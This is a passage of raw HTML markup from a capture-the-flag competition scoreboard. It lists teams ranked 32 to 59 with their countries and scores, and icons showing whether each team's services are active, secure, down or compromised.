width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>32</td><td><img width="20px" height="="20px"" src="147.jpg"><b> HakM@ri$t </b></td><td>US <img src="us.png"></td><td><b>222.0</b></td><td>3</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>33</td><td><img width="20px" height="="20px"" src="207.jpg"><b> Persistent Threat Hacking Club </b></td><td>US <img src="us.png"></td><td><b>210.2</b></td><td>2</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>34</td><td><img width="20px" height="="20px"" src="202.jpg"><b> Team Omega </b></td><td>US <img src="us.png"></td><td><b>206.6</b></td><td>6</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>35</td><td><img width="20px" height="="20px"" src="181.jpg"><b> THC </b></td><td>NL <img src="nl.png"></td><td><b>201.9</b></td><td>1</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>36</td><td><img width="20px" height="="20px"" src="164.jpg"><b> Team.iCTF.CrySyS.A </b></td><td>HU <img src="hu.png"></td><td><b>197.6</b></td><td>211</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>37</td><td><img width="20px" height="="20px"" src="156.jpg"><b> WeAreScientists </b></td><td>AT <img src="at.png"></td><td><b>192.1</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>38</td><td><img width="20px" height="="20px"" src="191.jpg"><b> H4x0rPsch0rr </b></td><td>DE <img src="de.png"></td><td><b>188.9</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>39</td><td><img width="20px" height="="20px"" src="198.jpg"><b> in23canation </b></td><td>DE <img src="de.png"></td><td><b>179.1</b></td><td>1</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>40</td><td><img width="20px" height="="20px"" src="206.jpg"><b> Lobotomy </b></td><td>RU <img src="ru.png"></td><td><b>179.0</b></td><td>123</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>41</td><td><img width="20px" height="="20px"" src="177.jpg"><b> Bushbabies </b></td><td>RU <img src="ru.png"></td><td><b>173.7</b></td><td>21</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>42</td><td><img width="20px" height="="20px"" src="140.jpg"><b> c00kies@venice </b></td><td>IT <img src="it.png"></td><td><b>166.5</b></td><td>143</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>43</td><td><img width="20px" height="="20px"" src="212.jpg"><b> Kernel Sanders </b></td><td>US <img src="us.png"></td><td><b>154.3</b></td><td>1</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>44</td><td><img width="20px" height="="20px"" src="134.jpg"><b> WizardsOfDos </b></td><td>DE <img src="de.png"></td><td><b>136.8</b></td><td>5</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>45</td><td><img width="20px" height="="20px"" src="139.jpg"><b> 49th Security Division </b></td><td>US <img src="us.png"></td><td><b>129.0</b></td><td>254</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>46</td><td><img width="20px" height="="20px"" src="154.jpg"><b> Cheddar Horsemen </b></td><td>AU <img src="au.png"></td><td><b>128.6</b></td><td>65</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>47</td><td><img width="20px" height="="20px"" src="129.jpg"><b> SecDawgs </b></td><td>US <img src="us.png"></td><td><b>127.3</b></td><td>350</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>48</td><td><img width="20px" height="="20px"" src="160.jpg"><b> NULLify </b></td><td>US <img src="us.png"></td><td><b>122.8</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>49</td><td><img width="20px" height="="20px"" src="176.jpg"><b> SchwarzwalderKriptSciddies </b></td><td>DE <img src="de.png"></td><td><b>111.2</b></td><td>409</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>50</td><td><img width="20px" height="="20px"" src="159.jpg"><b> Hackademics </b></td><td>DE <img src="de.png"></td><td><b>108.4</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>51</td><td><img width="20px" height="="20px"" src="187.jpg"><b> CeSeNA </b></td><td>IT <img src="it.png"></td><td><b>104.2</b></td><td>9</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>52</td><td><img width="20px" height="="20px"" src="173.jpg"><b> Honeypot </b></td><td>RU <img src="ru.png"></td><td><b>66.8</b></td><td>29</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>53</td><td><img width="20px" height="="20px"" src="141.jpg"><b> h4ck!nb3rg </b></td><td>AT <img src="at.png"></td><td><b>60.2</b></td><td>545</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>54</td><td><img width="20px" height="="20px"" src="145.jpg"><b> Ulm Security Sparrows </b></td><td>DE <img src="de.png"></td><td><b>52.6</b></td><td>1276</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>55</td><td><img width="20px" height="="20px"" src="135.jpg"><b> int80 </b></td><td>US <img src="us.png"></td><td><b>30.1</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>56</td><td><img width="20px" height="="20px"" src="199.jpg"><b> Local Maximum </b></td><td>DE <img src="de.png"></td><td><b>29.1</b></td><td>4</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>57</td><td><img width="20px" height="="20px"" src="179.jpg"><b> Wild Hatz </b></td><td>US <img src="us.png"></td><td><b>27.0</b></td><td>0</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>58</td><td><img width="20px" height="="20px"" src="132.jpg"><b> f0gd0gs </b></td><td>US <img src="us.png"></td><td><b>17.4</b></td><td>1167</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>59</td><td><img width="20px" height="="20px"" src="162.jpg"><b> The Cavalry </b></td><td>US <img src="us.png"></td><td><b>7.9</b></td><td>954</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img 